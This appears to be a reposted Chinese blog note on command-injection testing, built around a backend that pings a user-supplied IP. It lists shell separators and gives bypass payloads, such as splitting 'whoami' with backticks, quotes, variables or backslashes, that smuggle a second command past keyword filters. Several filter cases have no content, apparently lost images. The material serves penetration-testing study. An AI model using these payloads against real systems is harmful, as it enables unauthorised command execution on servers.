您的位置:首页 > 其它

命令执行常用命令

2018-05-28 13:23 204 查看
在***测试过程中,会遇见一些关于命令执行的漏洞,下面是收集的一些常用命令:

;   <   >   <>  |   ||  &  &&   `` ()   ' '

假设一种场景,从前端接收ip比如:127.0.0.1,后端对该ip进行ping测试: ping 127.0.0.1

没有任何防护



过滤了|



过滤了 ; |



过滤了 ; | &



过滤了 whoami关键字
ping -c 1 127.0.0.1|wh``oami



过滤了whoami ``
ping -c 1 127.0.0.1|wh''oami



过滤了whoami `` ''
ping -c 1 127.0.0.1;a=who;b=ami;$a$b



过滤了whoami `` '' $
ping -c 1 127.0.0.1|whoam""i



过滤了whoami `` '' $ "" ;
ping -c 1 127.0.0.1|whoam\i

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  命令 执行 常用命令